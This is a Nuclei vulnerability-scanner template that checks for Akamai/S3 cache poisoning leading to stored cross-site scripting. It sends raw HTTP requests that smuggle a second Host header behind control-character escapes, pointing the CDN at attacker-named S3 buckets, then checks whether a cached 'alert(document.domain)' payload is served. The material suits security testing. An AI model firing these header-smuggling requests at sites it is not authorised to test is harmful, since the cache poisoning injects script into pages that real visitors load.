nuclei-templates/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml

65 lines
1.5 KiB
YAML

id: akamai-s3-cache-poisoning
info:
name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting
author: DhiyaneshDk
severity: high
reference:
- https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
- https://owasp.org/www-community/attacks/Cache_Poisoning
metadata:
verified: "true"
tags: cache,poisoning,generic,xss,akamai,s3
variables:
rand: "{{rand_base(5)}}"
requests:
- raw:
- |+
GET /nuclei.svg?{{rand}}=x HTTP/1.1
Host: {{Hostname}}
{{escape}}Host: {{bucket}}
- |+
GET /nuclei.svg?{{rand}}=x HTTP/1.1
Host: {{Hostname}}
attack: clusterbomb
payloads:
escape:
- "\x0b"
- "\x0c"
- "\x1c"
- "\x1d"
- "\x1e"
- "\x1f"
bucket:
- "nuclei-ap-northeast-1"
- "nuclei-ap-northeast-2"
- "nuclei-ap-northeast-3"
- "nuclei-ap-south-1"
- "nuclei-ap-southeast-1"
- "nuclei-ap-southeast-2"
- "nuclei-ca-central-1"
- "nuclei-eu-central-1"
- "nuclei-eu-north-1"
- "nuclei-eu-west-1"
- "nuclei-eu-west-2"
- "nuclei-eu-west-3"
- "nuclei-sa-east-1"
- "nuclei-us-east-1"
- "nuclei-us-east-2"
- "nuclei-us-west-1"
- "nuclei-us-west-2"
stop-at-first-match: true
unsafe: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "alert(document.domain)")'
- 'status_code_2 == 200'
condition: and